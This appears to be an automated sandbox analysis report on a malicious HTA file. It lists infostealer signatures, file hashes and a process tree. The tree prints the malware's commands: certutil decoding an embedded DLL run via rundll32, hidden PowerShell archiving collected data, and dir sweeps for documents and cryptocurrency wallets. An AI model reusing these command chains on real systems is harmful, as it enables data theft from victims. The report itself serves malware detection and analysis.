Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    02/11/2024, 08:04

General

  • Target

    bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta

  • Size

    70KB

  • MD5

    4b4622857d5a8049c8eabc65cbbf9759

  • SHA1

    3c0b1087394f1584a53ae19a60eeee26adf5323a

  • SHA256

    bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234

  • SHA512

    bd4e13fc189cff886ac5097814fb35145d897c8f3626df93ba1413fdb38117d3df48152fa099c3bfb4852760425bb97f07aa6020e61331580c7780604285cf9e

  • SSDEEP

    1536:qzp24Z02CaLYQZ3h+3vsA7gI8GLRMsQMIF9AbR0F:ErZFJYYx+fsAD8qqsQMIFKC

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Deobfuscate/Decode Files or Information 1 TTPs 4 IoCs

    Payload decoded via CertUtil.

  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2496
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log password.txt & del 1.log && password.txt
      2⤵
      • Deobfuscate/Decode Files or Information
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2944
      • C:\Windows\SysWOW64\findstr.exe
        findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2864
      • C:\Windows\SysWOW64\certutil.exe
        certutil -decode -f 1.log password.txt
        3⤵
        • Deobfuscate/Decode Files or Information
        • System Location Discovery: System Language Discovery
        PID:2984
      • C:\Windows\SysWOW64\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\password.txt
        3⤵
        • System Location Discovery: System Language Discovery
        • Opens file in notepad (likely ransom note)
        PID:2604
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local & findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log netserv32.dll & del 1.log & rundll32 netserv32.dll,MainWork
      2⤵
      • Deobfuscate/Decode Files or Information
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3000
      • C:\Windows\SysWOW64\findstr.exe
        findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2756
      • C:\Windows\SysWOW64\certutil.exe
        certutil -decode -f 1.log netserv32.dll
        3⤵
        • Deobfuscate/Decode Files or Information
        • System Location Discovery: System Language Discovery
        PID:2204
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32 netserv32.dll,MainWork
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2724
        • C:\Windows\system32\rundll32.exe
          rundll32 netserv32.dll,MainWork
          4⤵
          • Blocklisted process makes network request
          • Looks for VMWare Tools registry key
          • Loads dropped DLL
          • Accesses Microsoft Outlook accounts
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2844
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -w hidden Compress-Archive -CompressionLevel Optimal -Path "C:\Users\Admin\AppData\Local\Temp\nsv9B18.tmp" "C:\Users\Admin\AppData\Local\micro.log.zip"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1928
          • C:\Windows\system32\cmd.exe
            cmd.exe /c dir C:\Users\Admin\*.hwp C:\Users\Admin\*.pdf C:\Users\Admin\*.doc C:\Users\Admin\*.docx C:\Users\Admin\*.xls C:\Users\Admin\*.xlsx C:\Users\Admin\*.zip C:\Users\Admin\*.rar C:\Users\Admin\*.egg C:\Users\Admin\*.txt C:\Users\Admin\*.jpg C:\Users\Admin\*.png C:\Users\Admin\*.jpeg C:\Users\Admin\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
            5⤵
              PID:1828
            • C:\Windows\system32\cmd.exe
              cmd.exe /c dir C:\Users\Admin\*wallet* C:\Users\Admin\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
              5⤵
                PID:1732
              • C:\Windows\system32\cmd.exe
                cmd.exe /c dir d:\*.hwp d:\*.pdf d:\*.doc d:\*.docx d:\*.xls d:\*.xlsx d:\*.zip d:\*.rar d:\*.egg d:\*.txt d:\*.jpg d:\*.png d:\*.jpeg d:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
                5⤵
                  PID:1260
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c dir d:\*wallet* d:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
                  5⤵
                    PID:448
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /c dir f:\*.hwp f:\*.pdf f:\*.doc f:\*.docx f:\*.xls f:\*.xlsx f:\*.zip f:\*.rar f:\*.egg f:\*.txt f:\*.jpg f:\*.png f:\*.jpeg f:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
                    5⤵
                      PID:2392
                    • C:\Windows\system32\cmd.exe
                      cmd.exe /c dir f:\*wallet* f:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
                      5⤵
                        PID:2924

              Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\1.log

                      Filesize

                      59KB

                      MD5

                      71593a662d03e58b27b29ab199a6d7b5

                      SHA1

                      d24e55399d35ac3a25f1b6a8d3bdd0e3e37db5d2

                      SHA256

                      e6da91d2fc4d3029e3915e9f7fc9586bf76f8ee024082c05ee4e5bf0f174c237

                      SHA512

                      c8005c9131b575f15ccd8bcde0fe66f820fff8b4c54800fdcaf814c1aede5f98343854276c301210c0935bf2669f925eafc2ecd15ff88496ededd918bfca3b07

                    • C:\Users\Admin\AppData\Local\Temp\1.log

                      Filesize

                      22B

                      MD5

                      2ac7510166832b4a6e4344f37d944578

                      SHA1

                      c766dd5112d72620614842d4bf0e986c34c5a2d0

                      SHA256

                      09e4c6d57fbf21a95fab469149ac50d73ee046f2bc2e57b6565eb0e9adf9e1ad

                      SHA512

                      ecb5c29e8e1d81b914b1d4c3e2787cf2b78d5707473f368aa48df6af1b7235adac5f96ccd43cfc0501f93640b52dd4b06905c889ffd0e9b7c989e150c89e521a

                    • C:\Users\Admin\AppData\Local\Temp\password.txt

                      Filesize

                      14B

                      MD5

                      6a0e721cb89a06736206b91af92239cd

                      SHA1

                      bb87db8bbcb512a584c45c80504fc21a0a972b3a

                      SHA256

                      a5a56f7eed7db360188ca88386bed5c84a8146b99ece4e68a3abfdbb5f091015

                      SHA512

                      c9921cafd2a284c3bc32b845685e25f03bc9fbaa380dbecbe8bfd9ec4992d5cf4a832e462cf097bcbc12f1ae3b00a0c8e7688be373aede81a9bd331d400b6a0c

                    • C:\Users\Admin\AppData\Local\net

                      Filesize

                      478KB

                      MD5

                      de9438683614ccf3f0316139418985a9

                      SHA1

                      dcbbfb18c16f4bf9025233e6ecf42be64c33932d

                      SHA256

                      d5ec8265369b5f52a14b039c1f9495a343a9755a89b0c48db5983c94d140f18b

                      SHA512

                      925a919ecbe169adc2ebb10b9f93cc33ab5ba44794d3fccd0d7f2faa49c8a35b46e3c6779d0e357122433461bf48fc4af2f9571fae0aa11fd85c9dcc26a47470

                    • C:\Users\Admin\AppData\Local\notepad.log

                      Filesize

                      139KB

                      MD5

                      6199c9d0ad1df4105c85ae041e833a0e

                      SHA1

                      c9016a4bcd8bd2ea646dfa86e2c9c59cd9f50fd1

                      SHA256

                      c45b1bb615385f2b2b2c1bfb29646a89ef9beb9c4f00cbb5f16c02171c61bcf4

                      SHA512

                      b2b972ba63cfb93c6b59634ecf5f8ffda04c74ba9ee86dbd8fefea43ff408f86718a75a0e9282ba5fe122cb3079511847c6775393e1e2d5c556ec3e8ab599de3

                    • \??\c:\users\admin\appdata\local\netlist.log

                      Filesize

                      8KB

                      MD5

                      4c3a362b3f3e30e0d09cf23cf206d4f3

                      SHA1

                      8c83105c017fdd64b2bc094f295bfaa8ce074b39

                      SHA256

                      47efee3b0891b28c7ad69ba95c06f5fd2a45e0df0e4ec62307a24793a51b52bd

                      SHA512

                      c78174e522de99a4774b764d0b465d8dc0035d4aa4e46a5306f3985afc814af0290c1af11b78c0656d6915b0ddc36ecc726a21666694ebecc87277120f9dfda4

                    • \??\c:\users\admin\appdata\local\netlist.log

                      Filesize

                      9KB

                      MD5

                      38eb30a99834452a25809864e7116beb

                      SHA1

                      80271700c164e13a7a871d8530a71898bf4a64bc

                      SHA256

                      77062eba27314013f04f6a3aad6c6d60d5e2a9a9a289ea34fd83e87ccf9167b0

                      SHA512

                      48e013c5ca505310ee98f059c84fc619e1e41b03ab3fc9248688194e75eaa8a56bc7a6a68cb100c42115170b5791ba29d66ad381f2e4298660f0c72f8c4ed208

                    • \Users\Admin\AppData\Local\netserv32.dll

                      Filesize

                      44KB

                      MD5

                      56d4fcfa7eb3a84740081264c5c0f10a

                      SHA1

                      06edf5464d2cfe1a75f3600c9039eabab97248bd

                      SHA256

                      5a18a29791cfb18767a43bebb61f923e64be7988235213678514007174f60b3e

                      SHA512

                      df622d9aebc8b9367219777216ba7e21942974e048fa40233fb17d17a85d940f8301ab4c605703cfa4b9ffdc61f2095b2a96b6256d017b445e40e94aedfd8609

                    • memory/1928-86-0x0000000002890000-0x0000000002898000-memory.dmp

                      Filesize

                      32KB

                    • memory/1928-85-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

                      Filesize

                      2.9MB

                    • memory/2724-34-0x0000000000220000-0x000000000023F000-memory.dmp

                      Filesize

                      124KB

                    • memory/2724-35-0x0000000000220000-0x000000000023F000-memory.dmp

                      Filesize

                      124KB

                    • memory/2724-33-0x0000000000220000-0x000000000023F000-memory.dmp

                      Filesize

                      124KB

                    • memory/2724-94-0x0000000000220000-0x000000000023F000-memory.dmp

                      Filesize

                      124KB

                    • memory/2724-36-0x0000000000220000-0x000000000023F000-memory.dmp

                      Filesize

                      124KB

                    • memory/2724-92-0x0000000000220000-0x000000000023F000-memory.dmp

                      Filesize

                      124KB

                    • memory/2844-68-0x0000000180000000-0x0000000180127000-memory.dmp

                      Filesize

                      1.2MB

                    • memory/2844-67-0x0000000180000000-0x0000000180127000-memory.dmp

                      Filesize

                      1.2MB

                    • memory/2844-64-0x0000000180000000-0x0000000180127000-memory.dmp

                      Filesize

                      1.2MB

                    • memory/2844-52-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp

                      Filesize

                      124KB

                    • memory/2844-101-0x0000000180000000-0x0000000180032000-memory.dmp

                      Filesize

                      200KB

                    • memory/2844-117-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp

                      Filesize

                      124KB

                    • memory/2844-119-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp

                      Filesize

                      124KB

                    • memory/2844-118-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

                      Filesize

                      124KB

                    • memory/2844-121-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

                      Filesize

                      124KB

                    • memory/2844-53-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

                      Filesize

                      124KB

                    • memory/2844-54-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp

                      Filesize

                      124KB

                    • memory/2844-134-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

                      Filesize

                      124KB

                    • memory/2844-139-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

                      Filesize

                      124KB

                    • memory/2844-140-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

                      Filesize

                      124KB